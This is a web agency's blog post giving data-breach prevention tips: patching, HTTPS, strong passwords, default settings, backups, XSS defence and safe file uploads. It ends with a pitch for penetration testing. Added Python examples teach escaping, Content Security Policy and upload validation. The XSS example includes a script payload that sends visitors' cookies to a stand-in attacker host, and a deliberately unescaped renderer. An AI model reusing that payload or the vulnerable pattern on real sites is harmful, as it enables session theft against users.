04/06/21

7 easy to follow tips to help you prevent a data breach

With the SolarWinds hack making the news again, it's time for all of us to ask whether our websites and systems are vulnerable to similar attacks. That's not to say you are likely to face a highly organised, targeted attack from a hostile state; however, every website and system can become a target for opportunistic criminals, and most attacks are automated and indiscriminate.

In light of our obligations under the GDPR and, at the very least, the preservation of our public image, it's important to be able to show that our websites and systems are secure and that the data we hold is kept away from prying eyes; this is why we're highlighting the importance of regular penetration testing.

What is Penetration Testing?

Penetration Testing is a way of checking whether your system can be exploited, using the same techniques an attacker would use to gain access. The National Cyber Security Centre defines Penetration Testing (or Pen Testing) as "a method for gaining assurance in the security of an IT system by attempting to breach some or all of that system's security, using the same tools and techniques as an adversary might".

This is an authorised, scoped attack that simulates a real cyberattack on a computer system. It is essential for site owners because it shows which weaknesses can actually be exploited, rather than just listing theoretical issues.

As a result of Pen Testing, a company can identify its weaknesses, prioritise them by risk, and then set about closing them.

How do you conduct a Penetration Test?

There are several types of penetration test (external, internal, web application, wireless, social engineering), and the type chosen usually reflects the system being tested and the importance of the system or data that you need to protect. For the purpose of this post, we're going to focus on testing for vulnerabilities in websites.

This type of testing checks that developers have followed secure development practices, by looking specifically for weaknesses or vulnerabilities that could compromise data or, at the very least, cause a loss of service or website functionality.

Why is it important?

There is hardly a day when we don't read in the news about a company being breached, with even some of the highest-profile companies falling victim. Recent breaches have included British Airways and EasyJet, which exposed the customer data of millions of people.

Our lives and businesses are increasingly reliant on and built upon a digital framework, and this has accelerated sharply since the COVID-19 pandemic struck. As a result, individuals and organised criminal groups have been looking to capitalise on our vulnerabilities, with cyber scams rising by over 31% between May and June 2020 alone (SecurityMagazine.com).

Security firm Nexor examined police data and found that between September 2019 and September 2020, 3,445 businesses within the UK were victims of scams, just under 50% of them since lockdowns were introduced, at an estimated cost of over £6m.

What can you do to ensure that your data is safe?

To be honest, if someone is determined to gain access to your website or system, they will often find a way. However, this doesn't mean that you have to make it easy for them: most attacks are automated and go after the easiest targets, so a few basic practices remove you from that pool. Here are some easy steps that anyone can take:

Keep your software up-to-date

This is one of the easiest things to do and should be a priority for everyone. Once a vulnerability has been identified, developers release a fix to close it, but the vulnerability is publicly disclosed at the same time, and attackers start scanning for unpatched systems very quickly after a disclosure. This applies not just to your CMS but to its plugins and themes, and to the server software underneath.

Use HTTPS protocol

Along with its good standing with Google and the benefits to a website's SEO, HTTPS (Hypertext Transfer Protocol Secure, if you wanted to know, which is HTTP carried over TLS) ensures that users' browsers are connecting to the genuine server and that the data being transferred cannot be read or tampered with by anyone in between. This is especially important when handling login details or accepting payment details through your website. Serve the whole site over HTTPS, redirect plain HTTP to HTTPS, and keep the certificate renewed.

Ensure that you use strong passwords

The weakest point in most systems is the user. We all know that we should use strong, unique passwords to protect access to sensitive information, but many people still don't.

We cannot emphasise this enough, and you would genuinely be shocked to see how many people use default passwords or very simple passwords to protect their websites (in fact, the most commonly used password is still 123456!).

As a rule, don't use any personal information such as your birthday or mother's maiden name, as these can be found out easily, and definitely no more "Password1", people… you know who you are! A password manager will generate and remember long, unique passwords for you, and turning on multi-factor authentication for the site's admin login means a stolen password alone is not enough.
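As an added example (not code from the original post), here is a small password check of the kind a site's registration or password-change form can run: it rejects anything too short, anything on a blocklist of common passwords (the blocklist here is a constructed ten-entry sample; load a full breached-password list in production), and anything that embeds the user's own personal details. The function names are illustrative.

```python
"""Password policy check: length, a common-password blocklist, and personal data.

Added example (not from the original post). COMMON_PASSWORDS is a constructed
ten-entry sample; in production load a full breached-password list from a file.
"""
import re
from typing import Iterable, List

COMMON_PASSWORDS = {
    "123456", "password", "qwerty", "123456789", "12345678",
    "111111", "letmein", "admin", "welcome", "iloveyou",
}

MIN_LENGTH = 12


def _normalise(value: str) -> str:
    """Lower-case and drop non-alphanumerics so 'Smith-Jones' matches 'smithjones'."""
    return re.sub(r"[^a-z0-9]", "", value.lower())


def check_password(password: str, personal_info: Iterable[str] = ()) -> List[str]:
    """Return the reasons a password is weak; an empty list means it is acceptable."""
    problems = []
    lowered = password.lower()

    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")

    # Strip trailing digits and symbols before the blocklist lookup so that
    # 'Password1' and 'password!' are still caught by the 'password' entry.
    stem = re.sub(r"[^a-z]+$", "", lowered)
    if lowered in COMMON_PASSWORDS or stem in COMMON_PASSWORDS:
        problems.append("appears in the common-password blocklist")

    # Personal data (name, date of birth, company name, username) is easy to
    # look up, so reject any password that embeds it.
    normalised_pw = _normalise(password)
    for item in personal_info:
        token = _normalise(item)
        if len(token) >= 4 and token in normalised_pw:
            problems.append(f"contains personal information ({item!r})")

    return problems
```

The check returns every reason at once so the form can tell the user what to fix, rather than making them guess one rule at a time.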

Don’t rely on default settings

Common attacks on websites are automated by bots that rely on people not changing the default settings of their CMS: the default admin username, the default login address, sample content and plugins that are installed but never used. These are very simple to change, and you should also give each user on your site only the level of access they actually need.

Does the new office junior who updates the blog each week really need full administrator access, able to change everyone's passwords and delete the website? Probably not.

Backup regularly

The worst-case scenario for any breach or attack is that you lose everything. Think about the impact that would have; not good, right? The simplest way of ensuring that this doesn't happen is to back up regularly. We recommend keeping multiple copies, with at least one stored somewhere the website's own server cannot reach, so that an attacker who gets into the server cannot delete the backups too, and we recommend actually testing that you can restore from them.

There are then the more advanced methods that you can implement, such as:

Protect against XSS attacks

XSS (Cross-Site Scripting) attacks are when an attacker injects malicious JavaScript into your website, typically through user input (a search box, a comment, a profile field) that the site echoes back into the page without escaping it. The script then runs in your visitors' browsers, where it can change what they see and capture information they submit to your site in good faith, such as login details.

One defence is a Content Security Policy (CSP), an HTTP response header that tells the browser which sources it is allowed to load scripts from. A script injected from elsewhere does not match the policy, so the browser refuses to run it. CSP is a backstop rather than a substitute for the basic fix, which is to escape user input whenever it is written into a page.
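To make the two halves of that concrete, here is an added example (not code from the original post) showing a page renderer that is vulnerable to reflected XSS, the escaped version of the same renderer, and a CSP header built with a per-request nonce and a host allowlist. It also includes a deliberately simplified model of the browser's script-src decision so you can see why an injected inline script is blocked. The function names, the attacker payload and the page origin https://example.com are assumptions for illustration.

```python
"""Reflected XSS: a vulnerable renderer, its escaped form, and a CSP header.

Added example, not code from the original post. The function names and the
page origin https://example.com are assumptions for illustration only.
"""
import secrets
from html import escape
from typing import Dict, List, Optional, Tuple

PAGE_ORIGIN = "https://example.com"

# Constructed attacker input: a "search term" that is really a script.
PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_vulnerable(search_term: str) -> str:
    """Interpolates user input straight into HTML, so the browser runs PAYLOAD."""
    return f"<p>You searched for: {search_term}</p>"


def render_safe(search_term: str) -> str:
    """Escapes < > & and quotes, so the input is shown as text, never executed."""
    return f"<p>You searched for: {escape(search_term, quote=True)}</p>"


def content_security_policy(nonce: str, script_hosts: Tuple[str, ...] = ()) -> str:
    """Allow scripts only from this site, the listed hosts, or tagged with the nonce."""
    script_src = " ".join(("'self'", f"'nonce-{nonce}'", *script_hosts))
    return (
        "default-src 'self'; "
        f"script-src {script_src}; "
        "object-src 'none'; "
        "base-uri 'self'"
    )


def script_allowed(policy: str, origin: Optional[str] = None, nonce: Optional[str] = None) -> bool:
    """Simplified model of the browser's script-src decision (illustration only).

    origin=None means an inline <script>, which needs a matching nonce.
    An external script needs its origin to be 'self' or explicitly listed.
    """
    directives: Dict[str, List[str]] = {}
    for directive in policy.split(";"):
        parts = directive.split()
        if parts:
            directives[parts[0]] = parts[1:]
    sources = directives.get("script-src") or directives.get("default-src", [])
    if origin is None:
        return nonce is not None and f"'nonce-{nonce}'" in sources
    if origin == PAGE_ORIGIN and "'self'" in sources:
        return True
    return origin in sources


def page_with_csp(search_term: str, script_hosts: Tuple[str, ...] = ()) -> Tuple[Dict[str, str], str]:
    """Return (headers, body) for a safe page: escaped output plus a per-request nonce."""
    nonce = secrets.token_urlsafe(16)
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": content_security_policy(nonce, script_hosts),
    }
    body = (
        "<!doctype html><html><body>"
        + render_safe(search_term)
        # Only scripts carrying this request's nonce will execute.
        + f'<script nonce="{nonce}" src="/static/app.js"></script>'
        + "</body></html>"
    )
    return headers, body
```

With this policy an injected `<script>` has no nonce, and an injected `<script src="https://evil.example/x.js">` comes from an unlisted origin, so the browser drops both even if the escaping were somehow bypassed. Generate a fresh nonce for every response; a fixed one is as good as none.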

Be cautious of allowing file uploads

In some situations it's important to allow users to upload files directly to a site; however, this functionality can be exploited. A classic example is an attacker uploading a script disguised as an image: if the file lands somewhere the web server will execute it, they now have a way to run their own code on your site.

You can minimise the risk by setting limits on file size and type, checking the file's actual content rather than trusting its extension, renaming the file on upload, scanning it for malware, and storing uploads outside the webroot so that the web server can never execute them.
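The following is an added example (not code from the original post) that applies those rules in one place: a size limit, an extension allowlist, a check that the first bytes of the file match what the extension claims, a random filename, and a storage directory outside the webroot. UPLOAD_ROOT is an assumed path under the system temp directory, the sample files are constructed, and the malware scan from the list above is left out (it would hand the validated bytes to a scanner before store_upload writes them).

```python
"""Upload handling: size limit, extension allowlist, content check, random name,
storage outside the webroot.

Added example, not code from the original post. UPLOAD_ROOT is an assumed
path under the system temp directory; malware scanning is left out and would
sit between validate_upload and the write in store_upload.
"""
import os
import secrets
import tempfile
from pathlib import Path

MAX_BYTES = 2 * 1024 * 1024  # 2 MiB; tune per use case

# Extension -> magic bytes the file content must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}

# Outside the webroot: the web server must not be able to serve or execute it.
UPLOAD_ROOT = Path(tempfile.gettempdir()) / "uploads-outside-webroot"

# Constructed sample inputs.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_SCRIPT = b"<?php echo 'not an image'; ?>"


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def validate_upload(filename: str, data: bytes) -> str:
    """Return the normalised extension, or raise UploadRejected."""
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("file is empty or exceeds the size limit")
    # Use only the last extension: 'shell.php.png' is judged as .png, and the
    # content check then decides whether it really is a PNG. The client's
    # filename is never used as a path, so '../' tricks have no effect.
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} is not permitted")
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("file content does not match its extension")
    return ext


def store_upload(filename: str, data: bytes, root: Path = UPLOAD_ROOT) -> Path:
    """Validate, then write under a random name so the client's name is never used."""
    ext = validate_upload(filename, data)
    root.mkdir(parents=True, exist_ok=True)
    dest = root / f"{secrets.token_hex(16)}.{ext}"
    # O_EXCL: never overwrite an existing file. 0o600: owner-only permissions.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return dest
```

One caveat: a magic-byte check only catches the crude case. A file can be a valid image and also carry script content further in (a polyglot), which is why the file must also live outside the webroot and be served back through your application, never executed by the web server.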

How we can help

To ensure that your website is as secure as possible, we can conduct a Penetration Test that provides a thorough security check and uncovers the vulnerabilities in your website and the network infrastructure behind it.

Following the test, we provide you with a full report detailing all of our findings, along with a prioritised, actionable list of the steps needed to fix each issue and close the loopholes.

Please Contact Us for more information and to discuss how we could help you.